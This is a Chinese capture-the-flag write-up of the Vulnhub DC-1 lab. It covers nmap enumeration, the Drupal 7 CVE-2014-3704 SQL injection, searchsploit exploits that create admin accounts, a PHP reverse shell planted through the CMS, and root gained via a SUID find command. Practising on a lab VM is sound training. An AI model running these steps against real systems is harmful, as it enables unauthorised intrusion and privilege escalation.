【Vulnhub系列靶场】Vulnhub_DC-1靶场渗透

原文转载已经过授权
原文链接：Lusen的小窝 - 学无止尽，不进则退 (lusensec.github.io)

一、环境准备

1、在百度网盘中下载DC-1靶场。DC-1靶场受virtual box 的影响，在VM中直接打开是扫描不到IP 的，我们需要先解决这个问题：【其他经验】Vulnhub靶机扫描不到IP解决办法

2、之后在VM中打开.ovf 文件，设置存储路径和任意名称

3、开机之后修改网络连接模式为【NAT】即可

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

2、端口扫描

1、粗略快速探测

nmap.exe -F 192.168.31.64

2、精细化扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.64
nmap.exe -sU --min-rate 10000 -p- 192.168.31.64

3、全扫描和漏洞探测

nmap.exe -sT -sV -sC -O -p22,80,111,45384,46146 192.168.31.64
nmap.exe --script=vuln -p22,80,111,45384,46146 192.168.31.64

Debian 操作系统

80端口发现：cve2014-3704漏洞、csrf 和一些敏感路径

3、web目录探测

dirsearch.cmd -u http://192.168.31.64 -x 404,403

4、web框架探测

whatweb http://192.168.31.64	#在kali中使用

使用了Drupal 7的框架

三、获取shell立足点

1、cve2014-3704 SQL注入

访问网站，确实是一个Drupal 7 框架的网站

根据nmap 探测出来的cve2014-3704 ，在漏洞库中进行查询

漏洞影响：Drupal 7.0~7.31

我们直接将这个数据包进行保存，修改Host 为靶机地址，抓包重放

利用成功，存在SQL注入

2、登录后台

我们利用这个SQL漏洞进行手工注入太过于麻烦，我们去searchsploit 上搜索有关Drupal 7 的相关漏洞

searchsploit.cmd Drupal 7

有四个符合版本信息，挨个尝试

cp exploits/php/webapps/34992.py /c/Users/Administrator/Desktop/test/

1、第一个是直接添加一个管理员用户的py脚本：34992.py

python2 34992.py -t http://192.168.31.64 -u admin123 -p admin123	
#添加一个账号密码均为admin123的管理员

用admin123:admin123登录后台

IP被加入黑名单了，我说怎么登录不了，我们稍等片刻。之后换了admin1234:admin1234，提示账号未激活不能使用。

2、我们尝试第四个php脚本：34993.php

修改我们的靶机地址

之后执行

之后用admin:admin进行登录

成功登录后台

3、获取shell立足点

在后台模块中开启PHP代码

进行保存，提示成功

我们随便找一篇文章进行修改

选择PHP代码

添加上PHP反弹shell代码

用nc 成功接收到shell

四、提权至root

1、敏感信息收集

1、www下的sites/default/settings.php 数据库配置文件

drupaldb数据库的账号密码：dbuser:R0ck3t

2、/etc/passwd 文件

存在flag4 这个用户

3、flag4.txt 文件

2、find高权限提权

find / -user root -perm -4000 -print 2>/dev/null

查找高权限命令

3、提权至root

采用find 进行提权，成功拿到root权限

find / -exec "/bin/sh" \;

原文转载已经过授权
更多文章请访问原文链接：Lusen的小窝 - 学无止尽，不进则退 (lusensec.github.io)